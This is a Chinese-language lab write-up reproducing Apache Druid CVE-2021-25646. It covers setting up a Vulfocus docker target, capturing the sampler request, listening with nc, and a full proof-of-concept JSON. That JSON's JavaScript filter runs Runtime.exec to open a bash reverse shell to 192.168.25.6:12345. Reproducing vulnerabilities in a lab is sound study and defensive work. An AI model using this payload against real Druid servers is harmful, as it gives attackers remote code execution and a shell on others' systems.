一、漏洞介绍
Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。
影响版本:
Apache Druid <= 0.20.1二、靶场搭建
目前 Vulfocus 已经集成 Apache Druid 环境,可通过以下命令进行拉取运行:
docker pull vulfocus/apache_druid-cve_2021_25646:latest
docker run -d -P vulfocus/apache_druid-cve_2021_25646
Base directory:
quickstart/tutorial/
File filter:
wikiticker-2015-09-12-sampled.json.gz
3、输入完成后依次点击如下图所示按钮
4、然后一直点击右下角的 Next按钮
同时注意上方的导航栏,每点击一次 Next, 导航栏都会往后移动一个,到 filter之前 的时候,点 击Next进行抓包 。
注意看下图中红框中的内容,如果 不是filter ,说明抓错包了
5、用nc进行端口监听,等待反弹
6、构造攻击代码
替换数据包中POST的Data数据,改成POC(注意监听的IP及端口),发送数据包,执行反弹shell的命令
POC
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.25.6/12345 0>&1')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}
